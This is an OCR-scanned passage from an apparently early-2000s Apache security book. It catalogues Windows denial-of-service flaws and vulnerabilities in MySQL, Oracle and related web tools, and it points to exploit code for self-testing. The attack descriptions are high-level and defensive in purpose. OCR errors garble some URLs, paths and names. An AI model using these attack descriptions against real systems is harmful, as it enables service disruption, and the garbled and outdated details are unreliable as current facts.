Windows 2000 Advanced, W2K Datacenter Server, and SQL Server 6.5 
(and higher). It crashes services when remote attackers send 1024 
bytes of garbage to port 3372 (the default for MSDTC). 
palante@subterrain.net reported this vulnerability on January 31, 
2002, and as of this writing, no solution exists. Check 

http: //www.microsoft.com/technet/security for more information. 
Site Server is an integrated solution for corporate intranets, and 
enables users, via cphost .d11, to upload files. Rain Forest Puppy 
reported on January 29, 2002, that if users initiate an upload with a 
target URL of more than 250 characters, they can plant a temp file (or 
several) on the target, and eventually eat all disk space. As of this 
writing, no solution (other than disabling Site Server) exists. Check 
http: //www.microsoft.com/technet/security for more information. 
On XP, the file .manifest contains XML instructions related to how 
the desktop behaves. In XP Home and Professional, if attackers (local 
or remote) can alter this XML, they can cause DoS conditions (or 
worse). As of this writing, Microsoft has issued no patch or discussion. 
If you manage a Windows-based machine and use MSIE 5.5, 5.5SP1, 
or 5.5SP2, remote Webmasters can craft a special form that will hang 
your machine. As of this writing, Microsoft has issued no patch or 
discussion. 
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TABLE 4.3 Continued 





Attack 


Description 





MSIE Modeless Dialog 


MS UPNP DoS 


MSIE Refresh DoS 


M Key Exchange DoS 


ISA DoS 


GDI DoS 


If you manage a Windows-based machine and use MSIE 5.5, 5.5SP1, 
5.5SP2, or 6.0, remote Webmasters can use HTML containing a mode- 
less dialog box that will hang your machine. As of this writing, 
Microsoft has issued no patch or discussion. 

Microsoft’s Universal Plug and Play, a feature that enables Windows- 
based machines to detect and auto-configure devices, is vulnerable to 
DoS. In Windows 98, 98SE, XP, XP Home, XP Professional, and ME, 
UPNP uses Simple Service Discovery Protocol. Remote attackers can 
send a custom-crafted UDP packet that will hang affected, unpatched 
systems. The patch can be found at 

http: //download.microsoft.com/download/whistler/Patch/Q31500 
@/WXP/EN-US/Q315000_WXP_SP1_x86_ENU.exe. 

On all recent Windows versions, MSIE 5.5, 5.5SP1, 5.5SP2, and 6.0 are 
all vulnerable to a JavaScript-based DoS attack. The degree to which 
this eats your memory depends on how long you let the condition 
continue. To date, Microsoft hasn’t issued a patch or discussion (you 
might have to wait for a new release). The attack is simple: in 
JavaScript, malicious Webmasters reference the current document's 
self location as its self location. 

IPSEC uses the Internet Key Exchange (IKE) standard off port 500 (in 
part) to handle key swaps. Remote attackers can knock out the service 
(and possibly, victim systems, which, at this point, remain limited to 
Windows 2000) by connecting to port 500 on the target and issuing a 
packet flood. Try it on your system to test your weakness, with the 
code at 

http: //downloads.securityfocus.com/vulnerabilities/exploits/ 
nb-isakmp.c. As of this writing, no solution exists, other than filtering 
who can attach to port 500. 

Internet Security and Acceleration Server is a proxy and firewall tool 
most commonly deployed on Windows 2000 Server and Advanced 
Server. ISA servers choke when pummeled with fragmented UDP 
packets. To date, no solution exists. 

In Windows 2000 and XP, the Graphics Device Interface (GDI), when 
receiving malformed requests, chokes and blue-screens the targeted 
machine. To see whether your system is vulnerable, try the code at 
http: //downloads.securityfocus.com/vulnerabilities/exploits/ 
win32gdi-dos.txt. To date, no path has been issued, nor has 
Microsoft issued discussion about the issue. 
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TABLE 4.3 Continued 
Attack Description 


RDP DoS 2000 Server SP2, 2000 Server SP1, 2000 Server, and NT Terminal 
Server 4.0 are all vulnerable to Remote Data Protocol (RDP) attacks. 





Remote attackers can kill the service (and possibly, down the targeted 
machine) by sending a flurry of malformed RDP to targets. Test your 
system with the code available directly from http: //www.securityfo- 
cus.com/data/vulnerabilities/exploits/rdpdos. zip. 
SecurityFocus points to patches for various releases at 

http://www. securityfocus.com/cgi-bin/vulns- 
item.pl?section=solution&id=3445. 

LCP DoS The Local Procedure Call (LPC) system performs interprocess commu- 
nication on the local Windows 2000 machine, and handles such 
communication between client and server processes—and a host of 
other processes. Typical LPC transactions take place between the 
process and object managers. In unpatched Windows 2000 systems, 
attackers can send a malformed request that snags all subsequent 
messages in a restricted memory area. This will consume all available 
memory. The fix can be downloaded directly from http: //down - 
load.microsoft.com/download/win2000platform/Patch/Q266433/NT 
5/EN-US/Q266433_W2K_SP2_x86_en.EXE. (Note that this link will 
trigger an immediate download of an executable). 





Other Environmental Risks 


Beyond the aforementioned, you might encounter many other environmental risks 
related to your operating system. Most often, these will manifest through third-party 
applications you deploy that harness Windows’ underlying infrastructure. For this 
reason, you should closely study any third-party tool’s architecture before deploying 
it live. Such weaknesses are otherwise impossible to anticipate. 


Summary 


This chapter demonstrated that your operating system might easily undermine 
Apache’s fine security features. To avoid this situation, observe these basic points: 


e Choose an operating system that—at a minimum—offers discretionary access 
control (Windows NT, Windows 2000, Windows Data Center, Plan 9 from Bell 
Labs, or any variety of Unix). 


e Choose an operating system that you (or whoever will administrate your Web 
host) know well. 
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e Unless you’re a BSD wizard, choose an operating system that offers at least 
baseline technical support. 


e Watch security lists often, and when your operating system vendor issues 
patches or security updates, install these immediately. 


Next, we move on to the most likely application you’ll use in concert with Apache: 
your database. 
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Apache, Databases, and 


Security 


Tas to capture and retain users, your site must provide 
dynamic functionality, and no service is more dynamic 
than one that provides Web-to-database access. Hence, 
most Apache administrators at some point face database 
integration issues. And databases, like most tools that 
interface with Apache, raise security issues. This chapter 
looks at those issues. 


Apache Database Support 


Through either native or third-party tools and modules, 
Apache has long provided database support. Databases and 
database technologies that Apache now supports—natively 
or otherwise—include the following: 


Microsoft Access 
Adabas 
DB2 

DBI 
LDAP 
miniSQL 
MSQL 
MySQL 
ODBC 
Oracle 
PostGRES 
SOLID 


IN THIS CHAPTER 


e Apache Database Support 


e Apache and Proprietary 
Databases 


e Apache and MySQL 
e PostgreSQL 


e Apache and Commercial SQL 
Packages 


e General Database Security 
Measures 
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e SQLServer 
e Sybase 
e YARD 


The aforementioned products by no means represent all databases or database tech- 
nologies Apache supports. They’re merely the most well-known examples. Each 

introduces security issues. Some arise only when you deploy them with Apache, and 
others arise no matter what Web server or operating system you deploy underneath. 


Because in the final analysis it doesn’t matter how your Web host falls, I deemed 
these issues appropriate to discuss here. Although the problems are seldom attribut- 
able to Apache alone, they’ll bring your Web host down anyway. 


Apache and Proprietary Databases 


Proprietary databases can sometimes harbor holes that remain unknown until 
attackers exploit them. I strongly urge you to choose either a pre-existing, enterprise- 
worthy database management system (DBMS) that ships in open source, or a pre- 
existing, enterprise-worthy DBMS that’s well known and rigorously tested. 


Without disparaging your personal coding practices, I advise you that the propri- 
etary database solution most likely to harbor unknown holes could be one you 
create yourself. A database system that you write from scratch might harbor security 
issues without your knowledge. Secure programming practices are more elusive than 
they initially seem. 


Points to consider: 


e Your choice of data formats, unless you get creative, is limited. You can go with 
tabled or XML-based data types (or other structures easily accessible via ODBC 
or standard SQL statements and commands). This is great. With luck, you 
might slide by. However, crackers often crack such systems, chiefly because 
these storage mechanisms often rely on permissions alone. Rather than write 
such applications and grapple with complicated logic to simulate table, row, 
record, or field locking, why not choose a pre-existing, well-tested system? 


e If you develop your DBMS on Windows, you'll likely go with data structures 
common to or friendly to Windows. Many Windows folks choose Access. This 
isn’t unusual. A famous auction system online ran on Microsoft Access for 
almost two years. However, Access isn’t secure. Moreover, you don’t have 
Access’ source code, so you don’t know what’s inside—even if you use one of 
those nifty watch-call Windows utilities. So, unless some hacker is kind enough 
to highlight weaknesses in Access and post these conspicuously, you'll never 
know. 
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e Designing distributed database systems, especially on Unix or Mac OS X, 
demands in-depth knowledge of IPC and/or sockets. IPC and sockets them- 
selves introduce many security issues. 


e Apache already supports many open source, enterprise-worthy database 
systems, and most such systems plug in via modules, offering you decentral- 
ized, pick-and-choose functionality and features. 


In the end, it’s more secure, less expensive, and less time consuming to choose a 
DBMS that Apache integrates well with—and hopefully, your choice will be open 
source. However, this isn’t always possible. 


Many shops have long-standing contracts or relations with commercial vendors. If 
yours is one such enterprise, you might find yourself using Oracle or DB2 because 
your organization cannot deviate from its contractual obligations. Not a problem. 
Apache supports these solutions, too. Try to shoot for open source when you can, 
however, such as with MySQL, its variants, or PostgreSQL. The more you know about 
your database, the better off you'll be. 


Apache and MySQL 


Apache works seamlessly with MySQL and the combination is excellent, even in 
high-end computing environments. As the MySQL team explains on its Web site at 
http: //www.mysql.com: 


MySQL is the world’s most popular Open Source Database, designed for speed, power, and 


precision in mission critical, heavy load use. 


Indeed, MySQL—once a hacking project of limited scope—has become one of Earth’s 
most popular databases, and now runs on many platforms, including the following: 


e FreeBSD 
e Linux 
e NetBSD 
e NT 

e OS2 

e SCO 

e Solaris 


e Win32 
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More than this, MySQL drew substantial attention from independent developers 
worldwide. These individuals and groups developed many tools that gave MySQL 
additional features it did not initially have. This development wave led to the release 
of widely diverse utilities and technologies, including the following: 


e APIs 

e Authentication tools 

e Clients 

e Converters 

e Performance benchmarking tools 

e Tools to integrate MySQL with other products 
e Web tools 


e Windows programs 


MySQL also employs the client-server model, so you can therefore use it to house 
your database on one machine, and your Web interface on another. Web can stay 
outside the firewall, while MySQL can stay inside, cozy and snug. (Oracle and other 
high-end packages support this functionality, too, ala SQLNET, for example). 


Indeed, MySQL—notwithstanding its hacker-oriented cultural roots—is now an 
enterprise-worthy DBMS, and a fast one to boot. Table 5.1 gives an indication of how 
fast. The data summarizes MySQL’s performance against other systems when reading 
in two million rows by index. 


TABLE 5.1 MySQL Comparative Performance at Two Million Rows by Index 








Database Performance 
mysql 367 sec 
mysql_odbc 464 sec 
db2_odbc 1206 sec 
informix_odbc 121126 sec 
ms-sql_odbc 1634 sec 
oracle_odbc 20800 sec 
solid odbc 877 sec 
sybase_odbc 17614 sec 





Roughly, MySQL outperformed Oracle by a margin of 56:1, and Informix by 330:1 
(under the specified conditions, with ODBC). For further information, check the 
MySQL benchmark index, located here: http: //www.mysql.com/information/bench- 
marks.html. 
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Apache interfaces with MySQL—as with most external applications it deals with—by 
modules. Historically, it has done this through 


e mod_mysql 

e mod_mysql_include 

e Perl DBI modules (Perl DBI) 
e PHP modules 


mod_mysql 

In his online article “Using the Module MySQL,” Peter Verhas describes mod_sql as a 
tool that enables developers to talk to MySQL through ScriptBasic. For more informa- 
tion, please see http://www. scriptbasic.com. 


mod_mysql_ include 

mod_mysql_include is a MySQL Apache module that returns SQL query information 
in HTML. The author, Sascha Pechav, originally wrote mod_mysql_include to provide 
a low-overhead banner rotation system that enabled developers to embed MySQL 
query output into HTML. 


PHP Modules 


PHP is a powerful tool for interfacing with databases—especially MySQL. Its authors 
describe it as 


...a Widely-used general-purpose scripting language that is especially suited for Web develop- 
ment and can be embedded into HTML. 


PHP lets you nest your SQL queries in server-side HTML in files with a .phtm1, .php, 
-php3, or .php4 extension. When Apache reads these into memory, if it finds SQL 
queries there, it sends them to your database. I cannot express how fast this process 
is. At least not without giving a concrete example. 


In late 2001, a firm approached me about its newly founded Web site. For compli- 
cated reasons, firm managers wanted to keep the servers in Florida, but the data in 
California. They knew—at least in a general way—that this configuration, which had 
serious network failure issues, would slow down queries. If nothing else, the sheer 
distance that packets would cover was significant. 


I recommended Apache, MySQL, and PHP, and we implemented the plan. As I write 
this, their site is getting approximately 1,000 hits an hour—not many. Hence, it 
would be difficult to ascertain how their Apache, MySQL, and PHP configuration 
would operate under heavy stress. But I do know this: traversing a half-million 
records on a four-way trip, Apache takes less than a second to return a search result. 
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The four-way trip happens like this: 
1. A user in New York initiates a search on a Florida machine. 
2. The Florida machine contacts California. 
3. California pulls and forwards the results. 


4. The Florida machine relays the data to New York. 


So, adding PHP will significantly increase the speed you'll realize, and in this specific 
area, PHP blows away standard Perl DBI. However, that’s not the story’s end. 


PHP enables you to do extraordinary things, true. But it also has a long security 
history. We’ll cover it extensively in Chapter 12, “Hacking Secure Code: Apache at 
Server Side,” and Chapter 13, “Hacking Secure Code: Apache at Client Side,” but it’s 
worth noting here that PHP has had in the past (and will likely have in the future) 
serious security issues, issues that often result in server compromise. Take care when 
writing applications in PHP, and if there’s any rule to apply always, it’s this: Never 
construct command lines from user input. 


Vulnerabilities in or Associated with MySQL 


MySQL's tight design results in precious few holes. Most security issues instead 
revolve around tools that work in concert with MySQL. Table 5.2 covers the most 
recent security events in both categories. 


TABLE 5.2 MySQL Vulnerabilities 


Vulnerabilities Description 





AdCycle SQL Attack AdCycle (http: //www.adcycle.com/) is a powerful software suite 
powered by MySQL that manages advertisements on hosts. It offers 
many features, including IP, page, and keyword targeting (context- 
sensitive ads), impression and click frequency snooping, and so forth. 
The developers wrote it in Perl. Versions 1.12, 1.13, 1.14, 1.15, 1.16, 
and 1.17, all have multiple holes that enable remote attackers to alter 
SQL queries. As this went to press, | could find no evidence of a reso- 
lution. Check with AdCycle. 

AdRotate SQL Attack AdRotate Pro 2.0, a powerful banner ad rotation system, offers SSI and 
IMG TAG support, unlimited rotations, expire-by-date, views or clicks, 
default ads, ad weighting, custom user stats, and many other features. 
Unfortunately, AdRotate builds SQL queries and command lines from 
poorly filtered user input. Furthermore, AdRotate passes some such 
commands to the shell. This of course introduces all sorts of security 
issues. As of this writing, | could find no fix. AdRotate is located at 
http://www. vanbrunt.com/adrotate/. 


TABLE 5.2 Continued 
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Vulnerabilities 


Description 





Aktivate 


Conectiva Exposed Logs 


DOOW Permission Issue 


GeekLog Cookie Attack 


mod_auth_mysql 


MySQL Symlink Attack 


Aktivate is a shopping cart application, chiefly deployed on Linux. 
(Learn more about it at http: //www.allen-keul.com/aktivate/). 
Powered by MySQL, Aktivate is vulnerable to cross-host scripting 
attacks that can lead to session hijacking. Version 1.03 is reportedly 
affected, and to date, the vendor has supplied no patch. Thus, users 
can only protect themselves by disabling cross-scripting functionality 
in their browser. 

Conectiva Linux 5.1, 5.6, and 6.0 unpack /var/1log/mysql as world- 
readable, thus allowing any user to examine the contents therein. This 
was a serious issue because /var/1log/mysql1 contains significant intel- 
ligence information (such as usernames, passwords, and even account 
creation). The easy fix is to simply alter the permissions, for example, 
chmod 600 /var/log/mysql*. 

DOOW is a tool for building knowledge bases with MySQL. In DOOW 
v0.2.2.’s release notes, DOOW’s designers revealed that earlier DOOW 
versions didn’t aggressively check user permissions. This wasn’t a cata- 
strophic error, but will allow unauthorized users to access protected or 
restricted site areas. The solution is here: 

http: //prdownloads.sourceforge.net/doow/. 

GeekLog (http: //geeklog.sourceforge.net), which some consider 
the ultimate user logging system, had a flaw in version 1.3. The 
system, driven by MySQL, tracks users via user IDs nested in cookies. 
Attackers can naturally alter these values, and gain unauthorized 
access to user accounts. The developer has since addressed this issue, 
and you can upgrade to fix the problem. 

Vivek Khera’s mod_auth_mysql is an Apache authentication module 
component for MySQL. (Learn more at ftp://ftp.sage- 
au.org.au/pub/network/www/apache-msql/). mod_auth_mysql 
provides database authentication via MySQL. Affected versions (1.9) 
enable remote attackers to send SQL commands and, in limited 
circumstances, alter tables. Find the upgrade at 

ftp: //ftp.kcilink.com/pub/. 

Versions 3.20.32a and 3.23.34 harbored a hole whereby local users 
could attack MySQL and ultimately, even the underlying system. Local 
users could—if they had CREATE TABLE permissions—link to a root- 
writable file in /var/tmp and use this to overwrite data in a specified 
table of the same name. An upgrade exists to solve the problem. 
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TABLE 5.2 Continued 





Vulnerabilities 


Description 





PHPNuke Debug Hole 


PHPWebThings 


WinMySQLadmin 


Xoops Injection Attack 


PHPNuke is a management tool that provides administrative control 
over Web accounts (and other issues) through MySQL and many other 
databases. It contains debugging features. On January 18, 2002, 
Cabezon Aurélien reported that remote attackers could send a custom 
URL that will give them access to intelligence information about 
queries and server setup. Although no official patch or advisory has 
been issued, reports indicate that you can bypass this vulnerability by 
commenting out the line $sql1_debug in sql_layer.php. The hole 
affects versions 3.23.30, 3.23.31, 3.23.34, and 3.23.36. 

Peter Vreugdenhil discovered a hole in PHPWebThings, for which 
FreshMeat later issued a patch at 
http://freshmeat.net/redir/phpwebthings/15746/url_zip/phpweb 
things.zip. The problem was this: If attackers knew you were 
running PHPWebThings, they could pass malicious CGI values through 
it and thus modify incoming SQL queries (perhaps revealing the entire 
underlying database). 

WinMySQLadmin (like mysqlfront) enables Windows users to manage 
local or remote MySQL databases in a friendly, tabular, and column- 
based graphical interface (which beats trying to compress or read 
mysqliclient or mysqladmin output data on simple terminals). 
Unfortunately, WinMySQLadmin 1.1 stores your passwords in my. ini 
in clear text. No fix has been forthcoming, so the solution is to set 
restrictive permissions on my. ini. 

Xoops is a MySQL-friendly and PHP-driven Web portal package, avail- 
able at http: //xoops.sourceforge.net/modules/news/, which 
enables you to control user administration, site administration, and 
other tasks. Built to interface with MySQL (and PHP-aware), Xoop 
could save you a lot of time. In January 2002, Cabezon Aurelien, an 
independent researcher, determined that a script in the Xoop distribu- 
tion (userinfo.php) does filter metacharacters. Thus attackers using a 
custom-crafted URL can crash the service. No solution has yet been 
forthcoming. However, it’s not a problem. You can create a custom 
filter (s/[*a-zA-Z0-9\-=_]//;). This hole would affect all MySQL 
versions that you team up with Xoops. 





NOTE 


Also, note that one common mistake administrators make is failing to change MySQUL’s default 
password. (This is a common problem with many database packages, not merely MySQL.) 
After installation, scour your package’s documentation to ascertain if default passwords exist, 


and if so, change them immediately. 
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PostgreSQL 


PostgreSQL springs from the PostGRES package written at Berkeley, and shares many 
characteristics with Ingres. PostgreSQL is an advanced open source, object-oriented, 
relational database package that interfaces with several popular CGI languages, 
including but not limited to C, C++, Java, Perl, Tcl, and Python. 


PostgreSQL supports a wide range of advanced features, including but not limited to 
multi-version concurrency control, subselects, defaults, constraints, triggers, primary 
keys, quoted identifiers, literal string type conversion, type casting, and binary and 
hexadecimal integer input. 


PostgreSQL is a popular RDBMS to integrate with Apache, and for good reason. It’s 
fast, reliable, and most importantly, it’s had only a meager security history 
(although, tools for use in concert with it have had security issues). 


NOTE 


Indeed, PostgreSQL’s only major vulnerability emerged in versions 6.3.2 and 6.5.3. Both 
versions stored user passwords in plain text in a root-readable file. See http: //online.secu- 
rityfocus.com/bid/1139 for more information. 





Table 5.3 describes some common modules and tools for integration with 
PostgreSQL. 


TABLE 5.3 Apache PostgreSQL Tools 
Tool or Utility Description 





Apache-Session This module from Jeffrey Baker handles many Apache sessions issues, such 
as persistent cookies, tracking users, MD5-authentication, and so forth. It 
includes (among some 30 other tools) database-driven support for user 
sessions using PostgreSQL. Get it at 
http: //www.cpan.org/authors/id/JBAKER/Apache -Session- 
1.54.tar.gz. 

heitml From Helmut Emmelmann, Extended Interactive is an HTML programma- 
ble database extension of HTML that enables developers to quickly assem- 
ble HTML pages on-the-fly from embedded database structures. This 
package uses MSQL, Postgres, and Yard. Get it at http: //www.h-e- 
i.de/heitml. 

mod_aolserver This module from Robert S. Thau and Rob Mayoff is an AOLserver API 
emulator; it emulates enough of the AOLserver Tcl API to run the 
ArsDigita Community System. It interfaces with Apache, Tcl, and Oracle 
or PostgreSQL. Find it at http: //www.arsdigita.com/download/. 
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TABLE 5.3 Continued 
Tool or Utility Description 





mod_auth_pgsql This module from Giuseppe Tanzilli is an authentication module for 
Apache 1.3 to PostgreSQL. Get it at 
http://www. giuseppetanzilli.it/mod_auth_pgsql/. 

mod_pointer This module from Thomas Eibner maps domains to homepages elsewhere 
(a kind of redirect system based on databases). It uses either MySQL or 
PostgreSQL for storing mappings. Get it at 
http: //www.stderr.net/mod_pointer/. 

RADpage A utility from H.E.|, RadPage is a browser-based Rapid Application 
Development tool that enables users to rapidly build XML applications 
and middleware. It works with Postgres, Adabas, and MySQL. Get it at 
http://www. radpage.com. 

TalentSoft WebPlus This tool from Victor Tong is a Web+ (WebPlus) application development 
tool/database middleware. It currently supports Linux, Apache API, 
MySQL, miniSQL, and PostgreSQL. Get it at 
http: //www.talentsoft.com. 





Apache and Commercial SQL Packages 


Apache also interfaces with many commercial databases, including Oracle and 
Informix. Let’s take a quick look at those now. 


Apache and Oracle 


Apache interfaces well with Oracle, and I’ve personally had nothing but good luck 
with this combination on Solaris, Apache 1.3, Oracle 8, and Oracle Application 
Server. However, before you purchase Oracle, consider several points. 


First, if you’re like most folks who bought, borrowed, or stole this book, you’re 
working with Linux, a BSD variant, or Windows. If so—and you've had no previous 
Oracle experience—know this: Oracle is different than other databases out there. It 
has a unique installation procedure, method of operation, and security model. 


Oracle is also large and involved. You'll need 700 megabytes of disk space, a swap 
area double your RAM size, and clear partitions set aside expressly for Oracle. That is, 
Oracle resides on its own disk partitions (or should), and hence it’s not something 
that you simply toss on an already-populated disk drive. 


Indeed, introducing Oracle into any environment requires forethought. It might 
seem incredible, but engineers exist whose sole function in life (other than enjoying 
it) is to eyeball Oracle installation plans, make recommendations, and supervise the 
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process—and these folks come armed with calculators to do on-the-spot analysis of 
your partition balancing. 


Oracle’s new direction, furthermore, which Oracle adopted to keep up with technol- 
ogy’s advance, anticipates a Java-based world. Newer Oracle releases deploy Java 
extensively. Thus, if you choose Oracle—a major commitment—you’ll need at least 
one Java specialist on hand. 


From a purely administrative standpoint, Oracle provides an additional security layer 
and classifies all accessible objects as one of two things: resources anyone can access, 
and those only DBAs can access. If you apply—in addition to this model—your oper- 
ating system’s permission scheme, you'll emerge with a tight ship (notwithstanding 
several issues we'll discuss later in this chapter). 


On installation, Oracle makes at least two (and in some cases, more) default 
accounts, of which these are key: 


e syS—The SYS account is a standard Oracle account with DBA privileges that 
owns your base tables. 


e SYSTEM—The SYSTEM account is a standard Oracle account with DBA privileges 
that enables you to create additional tables or views. You generally use this 
account to maintain databases, and only DBAs should have access. 


NOTE 


Newer Oracle releases create default accounts (for training or demonstration purposes) whose 
logins and passwords are well known. After an installation, be sure to check what default files 
Oracle created. (This very issue opened a serious security hole.) 





You defend against unauthorized access to these accounts from the inside, whereas 
from the outside you defend against remote attackers gaining user-level access, access 
to services in unintended or unauthorized ways, or denying service. 


Oracle-Related Vulnerabilities 

Although Oracle’s advertising campaigns—several of which assert that Oracle is 
unbreakable—seem tough and hard-nosed, Oracle nonetheless has a significant secu- 
rity history. Most of the recent issues, however, admittedly revolve around new 
Oracle technologies, such as Web Cache (Oracle Web Cache caches static and 
dynamically generated Web pages). Table 5.4 summarizes the most recent Oracle 
issues. 


NOTE _ 


To access Oracle support pages, you may need to register with its site. 
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TABLE 5.4 Oracle-Related Vulnerabilities 


Vulnerability 


Description 





9iIAS Cache Overflow 


9iAS Cache Permissions 


9iIAS Cached Password 


9iIAS Web Cache DoS 


9iIAS Web Cache DoS 


9iIAS Web Cache DoS 


Auditing System 


dbsnmp DoS 


Oracle9iAS Web Cache 2.0.0.2 (NT) and 2.0.0.1 choke when attackers 
send a certain URL. Unlike other Web Cache DoS vulnerabilities, this one 
can be critical: An attacker can, under some conditions, pump processor 
utilization to 100%, thereby killing the box. Oracle patched this in 
December-January 2001. Get the fix at http: //metalink.oracle.com. 
In Oracle9iAS Web Cache and Application Server 2.0.0.2, 2.0.0.1, and 
2.0.0.0, the permissions derived when starting the system with 
$ORACLE_HOME/webcache/bin/webcached enable attackers to undertake 
tasks as user oracle. Oracle patched this in January 2002. Get the fix at 
http: //metalink.oracle.com. 

In Oracle9iAS Web Cache and Application Server 2.0.0.2, 2.0.0.1, and 
2.0.0.0, Web Cache exposes the administrator password in a world- 
readable file. Oracle patched this in January 2002. Get the fix at 

http: //metalink.oracle.com. 

Oracle9iAS Web Cache 2.0.0.2 (NT), 2.0.0.2, 2.0.0.1, and 2.0.0.0 all 
choke when attackers send successive period notations to port 4000. 
This will hang Web Cache. Oracle patched this in January 2002. Get the 
fix at http: //metalink.oracle.com. 

Oracle9iAS Web Cache 2.0.0.2 (NT), 2.0.0.2, 2.0.0.1, and 2.0.0.0 all 
choke when attackers send successive null characters to ports 1100, 
4000, 4001, and 4002. This will hang Web Cache. Oracle patched this 
in January 2002. Get the fix at http: //metalink.oracle.com. 
Oracle9iAS Web Cache 2.0.0.2 (NT), 2.0.0.2, 2.0.0.1, and 2.0.0.0 all 
choke when attackers send HTTP requests containing headers with a 
Content Length of 0 plus three 0a character combinations. This will 
hang Web Cache. Oracle patched this in January 2002. Get the fix at 
http: //metalink.oracle.com. 

Oracle8i 8.0.1, 8.0.2, 8.0.4, 8.0.5, 8.0.6, 8.1.5, 8.1.6, 8.1.7.1, 8.1.7, as 
well as Oracle9i 9.0 and 9.0.1 all ship without auditing turned on, and 
therefore don’t track user activity. Turn it on. If you don’t, Oracle will fail 
to record activity. 

In Oracle 8i, versions 8.0.1, 8.0.2, 8.0.4, 8.0.5, 8.0.6, 8.1.5, 8.1.6, 
8.1.7.1, and 8.1.7 run the TNS listener service. If remote attackers send 
dbsnmp_start or dbsnmp_stop directives to this service, a DoS condition 
will result. To test this theory, download and try this code: 

http: //downloads.securityfocus.com/vulnerabilities/exploits/d 
bsnmp.c. Oracle has not yet issued a patch for this. TNS (Transparent 
Network Substrate) Listener handles remote communications with 
Oracle database services, and therefore is essential in many cases. Here, 
your best bet—until Oracle issues a fix—is to filter incoming traffic using 
a firewall. Designate the hosts you want to have TNS access. 


TABLE 5.4 Continued 
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Vulnerability 


Description 





Default Accounts 


mod_auth_oracle 


Path Disclosure 


PL/SQL Buffer Overflow 


Shell Code Access 


Oracle 8i 8.0.1, 8.0.2, 8.0.4, 8.0.5, 8.0.6, 8.1.5, 8.1.6, 8.1.7.1, 8.1.7, 
Oracle 9i, 9.0, and 9.0.1 all install several default accounts for testing 
purposes. The installation routine sets the passwords for these accounts 
(and those passwords are now well known on the Net). Attackers 
approaching systems that retain these accounts can gain Oracle access. 
The solution is to delete or disable default accounts. 

mod_auth_oracle is an authentication module, originally designed by 
Serg Oskin for Oracle7 or Oracle8/8i clients. It gained more widespread 
use in Apache 1.3 plus Oracle8/8i and offers database-based authentica- 
tion using Oracle. Affected versions enable remote attackers to send SQL 
commands and, in limited circumstances, alter tables. Update to 0.5.4, 
located here: 

http: //www.macomnet.ru/~oskin/mod_auth_oracle.html. 

Oracle 9i Application Server ships with Apache and a Java engine for 
JSP/servlets. Learn more at http://www. oracle.com/ip/. With Oracle9i, 
when attackers send a request for a JSP file that doesn’t exist, it reveals 
internal Web paths. It throws a javax.servlet.ServletException 
message and reports that the system cannot find the specified file 
(http: //[path]/[file.jsp]). You should upgrade to OJSP 1.1.2.0.0, 
which can be found here: 

http: //otn.oracle.com/software/tech/java/servlets/ 
content.html. 

Oracle 9iAS ships with a PL/SQL Apache module that provides Database 
Access Descriptors (DAD) management facilities. This module, 
ModPL/SQL for Apache, is bundled with all versions of iAS, and serves 
as a gateway to call PL/SQL procedures from the Web. On Solaris, 
Windows NT/2000 Server, and HP-UX, the module suffers from a buffer 
overflow, which invites DoS and even the execution of arbitrary code. 
Get the patch here: http: //metalink.oracle.com. 

Oracle 8i 8.0.1, 8.0.2, 8.0.4, 8.0.5, 8.0.6, 8.1.5, 8.1.6, 8.1.7.1, 8.1.7, 
Oracle 9i, 9.0, and 9.0.1 all allow legitimately logged-on users (via 
SQL*Plus) to execute shell commands on the target. Couple this with 
the default account vulnerabilities also listed here, and you have a recipe 
for disaster. Answer: see http: //www.securityfocus.com/cgi- 
bin/vulns-item.p1?section=solution&id=3900. 
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Apache and Oracle Tools 


Apache and Oracle come from different cultures. Apache is an open source solution 
most commonly championed by Linux users. Oracle, on the other hand, is a pack- 
aged and well-supported product, and its foray into the Net’s freer regions is 


still new. 


Because of this, many Oracle tools were historically commercial applications or utili- 
ties. As Apache gained popularity (and interfaces from Oracle to Apache emerged), 
however, the networking community expressed a need for tools to draw Oracle closer 
and tighter into traditionally open source environments. Table 5.5 summarizes a few 
important tools that emerged as a result of this process. 


NOTE 


Some of the URLs below trigger immediate downloads. | chose them because all the modules 
are free and have no documentation page but rather contain documentation in the zipped 
files themselves. 


TABLE 5.5 | Oracle/Apache Tools 


Tool 


Description 





Apache -DnsZone 


Apache -Session 


Thomas Eibner (thomas@cpan.org) wrote this Perl module, which 
provides Apache: :DnsZone, Apache: :DnsZone: :AuthCookie, 

Apache: :DnsZone: :Config, Apache: :DnsZone: :DB, 

Apache: :DnsZone: :DB: :MySQL, Apache: :DnsZone: :DB: :Oracle, 
Apache: :DnsZone: :DB: :Postgresql, Apache: :DnsZone: : Language, 
Apache: :DnsZone: :Resolver. This will essentially handle DNS. Get it 
at http: //www.cpan.org/authors/id/T/TH/THOMAS/Apache - 
DnsZone-@.2.tar.gz. 

Jeffrey Baker (jwbaker@acm. org) wrote this Perl module, which 
provides a huge number of session-management components, includ- 
ing Apache: :Session, a persistence framework for session data; 
Apache: :Session::DB_ File, Apache: :Session: :File, 

Apache: :Session: :Flex (specify everything at runtime); 

Apache: :Session: :Generate: :MD5 (use MDS to create random object 
IDs); Apache: :Session: :Generate: :ModUniquelId (mod_unique_id for 
session ID generation); Apache: :Session: :Generate: :ModUsertrack 
(mod_usertrack for session ID generation); 


TABLE 5.5 Continued 
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Tool 


Description 





auth_oracle_module 


mod_aolserver 


mod_auth_ora7 


mod_auth_ora8 


Apache: :Session: :Lock: :File (mutual exclusion using flock); 
Apache: :Session: :Lock: :MySQL (mutual exclusion using MySQL); 
Apache: :Session: :Lock: :Null, 

Apache: :Session: :Lock: :Semaphore (mutual exclusion through 
semaphores); Apache: :Session: :MySQL, Apache: :Session: :Oracle, 
Apache: :Session: :Postgres, 

Apache: :Session: :Serialize: :Base64, 

Apache: :Session: :Serialize: :Storable (zip up persistent data); 
Apache: :Session: :Serialize: :Sybase (zip up persistent data and 
unpack/pack to put into Sybase-compatible image field); 

Apache: :Session: :Serialize: :UUEncode, 

Apache: :Session: :Store::DBI, Apache: :Session: :Store::DB_File, 
Apache: :Session::Store::File, Apache: :Session: :Store: :MySQL, 
Apache: :Session: :Store: :Oracle, 

Apache: :Session: :Store::Postgres, 

Apache: :Session::Store::Sybase, and Apache: :Session: : Sybase. 
Get it at http: //www.cpan.org/authors/id/JBAKER/Apache - 
Session-1.54.tar.gz. 

Serg Oskin (oskin@macomnet.ru) wrote this free authentication 
module for Apache 1.3 plus Oracle8. To use it, you need an Oracle8 
client. Get it at 

http: //www.macomnet.ru/~oskin/mod_auth_oracle.html. 

